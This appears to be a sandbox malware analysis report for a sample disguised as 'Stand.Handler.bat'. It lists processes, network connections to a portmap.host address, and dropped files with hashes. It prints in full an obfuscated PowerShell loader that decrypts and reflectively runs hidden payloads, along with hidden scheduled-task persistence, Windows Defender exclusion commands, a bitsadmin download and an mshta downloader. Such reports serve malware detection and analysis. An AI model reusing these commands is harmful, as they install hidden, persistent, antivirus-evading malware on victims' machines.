PID 3412 wrote to memory of 1188 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 3412 wrote to memory of 988 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 3412 wrote to memory of 2760 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 3412 wrote to memory of 2732 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\mshta.exe
PID 3412 wrote to memory of 2732 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\mshta.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k RPCSS -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Stand.Handler.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tX3lqGmOY/6C3S9lu7bskJOFzr7BWG83o03z91HSs3M='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tcoPI+6H25yjw8y/a/hjpA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $izumb=New-Object System.IO.MemoryStream(,$param_var); $eDQfo=New-Object System.IO.MemoryStream; $xllVv=New-Object System.IO.Compression.GZipStream($izumb, [IO.Compression.CompressionMode]::Decompress); $xllVv.CopyTo($eDQfo); $xllVv.Dispose(); $izumb.Dispose(); $eDQfo.Dispose(); $eDQfo.ToArray();}function execute_function($param_var,$param2_var){ $bsVjW=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $PVEip=$bsVjW.EntryPoint; $PVEip.Invoke($null, $param2_var);}$jENbu = 'C:\Users\Admin\AppData\Local\Temp\Stand.Handler.bat';$host.UI.RawUI.WindowTitle = $jENbu;$qAnWg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($jENbu).Split([Environment]::NewLine);foreach ($DfcJO in $qAnWg) { if ($DfcJO.StartsWith('CrsuqcOEqAjCofwNVLly')) { $OceyL=$DfcJO.Substring(20); break; }}$payloads_var=[string[]]$OceyL.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_367_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_367.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_367.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_367.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tX3lqGmOY/6C3S9lu7bskJOFzr7BWG83o03z91HSs3M='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tcoPI+6H25yjw8y/a/hjpA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $izumb=New-Object System.IO.MemoryStream(,$param_var); $eDQfo=New-Object System.IO.MemoryStream; $xllVv=New-Object System.IO.Compression.GZipStream($izumb, [IO.Compression.CompressionMode]::Decompress); $xllVv.CopyTo($eDQfo); $xllVv.Dispose(); $izumb.Dispose(); $eDQfo.Dispose(); $eDQfo.ToArray();}function execute_function($param_var,$param2_var){ $bsVjW=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $PVEip=$bsVjW.EntryPoint; $PVEip.Invoke($null, $param2_var);}$jENbu = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_367.bat';$host.UI.RawUI.WindowTitle = $jENbu;$qAnWg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($jENbu).Split([Environment]::NewLine);foreach ($DfcJO in $qAnWg) { if ($DfcJO.StartsWith('CrsuqcOEqAjCofwNVLly')) { $OceyL=$DfcJO.Substring(20); break; }}$payloads_var=[string[]]$OceyL.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe

"C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe"

C:\Windows\SysWOW64\bitsadmin.exe

"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Stand.Launchpad.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Stand.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Stand.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Stand" /tr "C:\Users\Admin\AppData\Local\Temp\Stand.exe"

C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe

"C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe"

C:\Users\Admin\AppData\Local\Temp\Stand.exe

C:\Users\Admin\AppData\Local\Temp\Stand.exe

C:\Users\Admin\AppData\Local\Temp\Stand.exe

C:\Users\Admin\AppData\Local\Temp\Stand.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
US 185.199.110.133:443 objects.githubusercontent.com tcp
N/A 127.0.0.1:57023 tcp
US 172.67.188.90:443 stand.gg tcp
US 172.67.188.90:443 stand.gg tcp
DE 193.161.193.99:57023 Name1442-57023.portmap.host tcp
DE 193.161.193.99:57023 Name1442-57023.portmap.host tcp
DE 193.161.193.99:57023 Name1442-57023.portmap.host tcp
N/A 127.0.0.1:57023 tcp
N/A 127.0.0.1:57023 tcp
DE 193.161.193.99:57023 Name1442-57023.portmap.host tcp
DE 193.161.193.99:57023 Name1442-57023.portmap.host tcp
N/A 127.0.0.1:57023 tcp
DE 193.161.193.99:57023 Name1442-57023.portmap.host tcp
N/A 127.0.0.1:57023 tcp
DE 193.161.193.99:57023 Name1442-57023.portmap.host tcp
N/A 127.0.0.1:57023 tcp
DE 193.161.193.99:57023 Name1442-57023.portmap.host tcp

Files

memory/2180-0-0x00007FFFFB0B3000-0x00007FFFFB0B5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_01adpfjx.wqv.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2180-9-0x0000018E70E90000-0x0000018E70EB2000-memory.dmp

memory/2180-10-0x00007FFFFB0B0000-0x00007FFFFBB72000-memory.dmp

memory/2180-11-0x00007FFFFB0B0000-0x00007FFFFBB72000-memory.dmp

memory/2180-12-0x00007FFFFB0B0000-0x00007FFFFBB72000-memory.dmp

memory/2180-13-0x0000018E71270000-0x0000018E712B6000-memory.dmp

memory/2180-14-0x0000018E71030000-0x0000018E71038000-memory.dmp

memory/2180-15-0x0000018E712C0000-0x0000018E7131C000-memory.dmp

memory/1200-17-0x00007FFFFB0B0000-0x00007FFFFBB72000-memory.dmp

memory/1200-26-0x00007FFFFB0B0000-0x00007FFFFBB72000-memory.dmp

memory/1200-27-0x00007FFFFB0B0000-0x00007FFFFBB72000-memory.dmp

memory/1200-30-0x00007FFFFB0B0000-0x00007FFFFBB72000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 df472dcddb36aa24247f8c8d8a517bd7
SHA1 6f54967355e507294cbc86662a6fbeedac9d7030
SHA256 e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA512 06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

C:\Users\Admin\AppData\Roaming\$phantom-startup_str_367.vbs

MD5 2d0828b6db2c325302c286be78c3c2ab
SHA1 6e38a94cc9d3de3e050cd06d30fcad4e1d279de0
SHA256 a07098aeddd090bac15701c8eaa0dc131ef4e667c401d3a36df347fad136e41d
SHA512 f38fc84dd8f644c848da35cbeec8dd8cf47eec49cbc38381ae6ba069ebfac5378f9384ca9c80c87e16c02ac17553e41e3bcbd5139e5a97c1e6950078bc70d862

C:\Users\Admin\AppData\Roaming\$phantom-startup_str_367.bat

MD5 b6de263fec4f04997a869ed7112b8759
SHA1 59d43ded2302f76f602e6ea7ae1285b373300f3b
SHA256 152c7242abce7287170a4025def239d75c3c294e0710f7073f6bbb25abc31c44
SHA512 5237ea099e1bfef0ea6daeb77a78ba45fde4facfc010fb8182568c69f9d67b6eb3bb5a74a51b54a2a89299abbc4b733f01b9ad6e2d36df857c0586a883489533

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 3ec0d76d886b2f4b9f1e3da7ce9e2cd7
SHA1 68a6a2b7b0fa045cd9cf7d63d4e30600a7b25dea
SHA256 214be9e8293b00fc05089068033edb41da350e0f127dd782bf6cb748000a56a5
SHA512 a49d758d03e3a7bc38be29d577c3e0d0c69eb08d0496a81b9406b446c5808d7dfbab39c5be3b45cbb4aec511d87c6166453cbd12cebe5d8663a60b5d773206c6

memory/2180-47-0x00007FFFFB0B0000-0x00007FFFFBB72000-memory.dmp

memory/3304-48-0x0000000002D10000-0x0000000002D3A000-memory.dmp

memory/2752-97-0x00007FF7DC670000-0x00007FF7DC680000-memory.dmp

memory/3304-96-0x00007FF7DC670000-0x00007FF7DC680000-memory.dmp

memory/1948-105-0x00007FF7DC670000-0x00007FF7DC680000-memory.dmp

memory/2584-104-0x00007FF7DC670000-0x00007FF7DC680000-memory.dmp

memory/1488-110-0x00007FF7DC670000-0x00007FF7DC680000-memory.dmp

memory/2544-111-0x00007FF7DC670000-0x00007FF7DC680000-memory.dmp

memory/1724-106-0x00007FF7DC670000-0x00007FF7DC680000-memory.dmp

memory/1092-102-0x00007FF7DC670000-0x00007FF7DC680000-memory.dmp

memory/3440-109-0x00007FF7DC670000-0x00007FF7DC680000-memory.dmp

memory/1252-108-0x00007FF7DC670000-0x00007FF7DC680000-memory.dmp

memory/2536-107-0x00007FF7DC670000-0x00007FF7DC680000-memory.dmp

memory/1168-101-0x00007FF7DC670000-0x00007FF7DC680000-memory.dmp

memory/1220-100-0x00007FF7DC670000-0x00007FF7DC680000-memory.dmp

memory/2392-103-0x00007FF7DC670000-0x00007FF7DC680000-memory.dmp

memory/1304-99-0x00007FF7DC670000-0x00007FF7DC680000-memory.dmp

memory/3468-98-0x00007FF7DC670000-0x00007FF7DC680000-memory.dmp

memory/3412-144-0x00000158750B0000-0x00000158750D8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe

MD5 86cfa35ef19ca1d1ed0dfbc031211833
SHA1 871f69775937be2dd3b066d9747b69fc07ddc58d
SHA256 f198341fbaac08171a208c4e61f6a47609cb0991d4c4e3f6741c1e281e17c5f5
SHA512 5889f8b3c033342c8b3749ef5191dc1206da03f0c5327a11dcf0e0ba186ae8a71514993f484fdfbcd6bdb515167bedd73cf3d3a6c8d86056889a823bac485261

memory/3636-159-0x0000000000940000-0x0000000000960000-memory.dmp

C:\Users\Admin\AppData\Roaming\Downloader.hta

MD5 4ec749a8c1d7d0a4be501465d297d3dc
SHA1 d7727cb4dc96d653bce6c6bbe70ff171ecc197b7
SHA256 7bd2ea1be121e862cc93c8c41429d0f9d1d3b57478e586bbeed7d3d3be3a96f6
SHA512 38d4ca973a3da55453dd37cb8965db223d42b03493b8d5390ab58cc3b53df1405119663f91bcef2ce2efc082ea17b0021c407eb65c6076d127408f2ff2c7d44e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2f8f22fd5d2b19935f8a6268fabe255c
SHA1 fea7116a5e56c501439fa0261d2c89564c939a1b
SHA256 c3129137313ae7bd0bc8b22bd043708e9890398876608f45c0ad33108a41d5c2
SHA512 2f5af078f6ec28116349e1dc4c05b4d6dc9bdcbe4f28bbeb0f43e1492a8a1aaaff074f4ea2a8119c3ea728c15ae721ecdaafad1d6a1edda208ee5dbc16b347ec

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d0a4a3b9a52b8fe3b019f6cd0ef3dad6
SHA1 fed70ce7834c3b97edbd078eccda1e5effa527cd
SHA256 21942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31
SHA512 1a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fb9fada5651a2593ce0268bd1ee523a6
SHA1 870a5771f5033c5a7cc418701790bf1dc139383d
SHA256 292dffc35560c53f5e8c2c5fc5345ecef3bcda441ac4226dc953d16ed1d1955b
SHA512 310746aec847ec95c5ce9b2ef05ef95b9a93ac7b00839becd742f8a5191172d248cd6ef06a96c32f3dea005263c0d81b01b126fdd47c033930f5ed1af0192a97

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 051a74485331f9d9f5014e58ec71566c
SHA1 4ed0256a84f2e95609a0b4d5c249bca624db8fe4
SHA256 3f67e4ba795fd89d33e9a1fe7547e297a82ae50b8f25eedc2b33a27866b28888
SHA512 1f15fd8ca727b198495ef826002c1cbcc63e98eecb2e92abff48354ae668e6c3aaf9bd3005664967ae75637bacee7e730ce36142483d08ae6a068d9ae3e0e17d

memory/2008-209-0x00000148CEB80000-0x00000148CEB96000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

MD5 15543a60a3a0a98eed5ae977ecc2c30f
SHA1 059607cfa2405d7c2eaad9ff153b86954c1b6157
SHA256 3d9be3f1566e0cdad525e7caeb835256815d90695f45f1c28e04e434e3fd89d0
SHA512 6d5210b83922827b84116dcb3a99d28c937033a8be5d4853da90d8bce6452ece7f587bff6639ae9ab757c216830a621a036cca14c863e948dae41a7dd0853a23

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

MD5 2165365efa5d88c4f10227e98111e1b1
SHA1 48f7e2441cef2a7db3a54018f2268bd2f78e543d
SHA256 ec48296e08db7830f1b734996ba46fd565a5fcf946e2a83768ca3f45a50a2a65
SHA512 5daa8d725aa9527aaad5234552c1398cce5b2bf87c1f60f77c6a5d21045ca2eda47fa30db984f991a8d382ef5410e083792a9f5121d5f038f22c8c7238020bc5

C:\Users\Admin\AppData\Local\Calamity,_Inc\Stand.Launchpad.exe_Url_rz0v4fzocioy3g23muw4v53aivui0hlg\1.9.0.0\user.config

MD5 b4ae24f20e59e454d57443d663a7581e
SHA1 68ab33e7fcea8bf79d76728fc49338d0d10a12f6
SHA256 8409dd0aa292b3bf50903a7ca1a1a0d6697d5c7b0ed3d1c5e43ebdf6f82db074
SHA512 25a7cbc382609d298ecaedea567231ac6ba0856bc523550912fd7b8393a29664ad68e9490dff0ff25b18b7a018476798c4df1000ebc99174bb6f2d5604e383f5

C:\Users\Admin\AppData\Local\Calamity,_Inc\Stand.Launchpad.exe_Url_rz0v4fzocioy3g23muw4v53aivui0hlg\1.9.0.0\user.config

MD5 4914bef93f236a5cb24b4c07e9d4a98a
SHA1 b53f8fb945a449dd8a76d4412c5439b29b929b9e
SHA256 0abb6c072277956c8e3d6810dc9d9795544098f46a1fc79ab2e39c3f70d84a5a
SHA512 3242dbf1f58263ab1409d558b5ba1846e235da17246f1abbab768ec1ed449367e30c6d17d4986aa117c42ea225e87ff2c438d46765f1b5841e3a5b9b571ccb10

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E943B0FFA8084B6B254AAF787773AA42_D4E29B2355F9CFB2431676E87E1A6DFC

MD5 a011ed357b5eb0966527d4d48bd68645
SHA1 ffc2da2d8b6089dbaca8e0ff512a1b34f42fd271
SHA256 cbd749ae38db1136c41628e784b4ff66e8152beb6082446cedbd2d1dafb5ce6c
SHA512 3cb0528d82db485281a911c5f5bf1dfed72a29c9ec05a3b1dff52068e859b8b1cef8bf18ce637b89557cd7ec39c4141d0189ac254555376a22f10bc231632380

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A37B8BA80004D3266CB4D93B2052DC10_A93CE4618EE38C3485BA7B27239D573A

MD5 4cafe4d0d4678e879e77a4899217bafd
SHA1 ef914aed6c98156f50cb0c098ff592d8c744bb65
SHA256 44c91ca37c9bba9ec0e9f8aa6808b780294bc43911560ba0ed77d81f3251732b
SHA512 75aef0cc5f2a07d820c2a421627f430230a9f9130409be84725994ec63a142a70efaf70417398dffbacc24fe0b8bed680558355b9e9bc331ed9fcced684facbd

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Stand.exe.log

MD5 2cbbb74b7da1f720b48ed31085cbd5b8
SHA1 79caa9a3ea8abe1b9c4326c3633da64a5f724964
SHA256 e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3
SHA512 ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9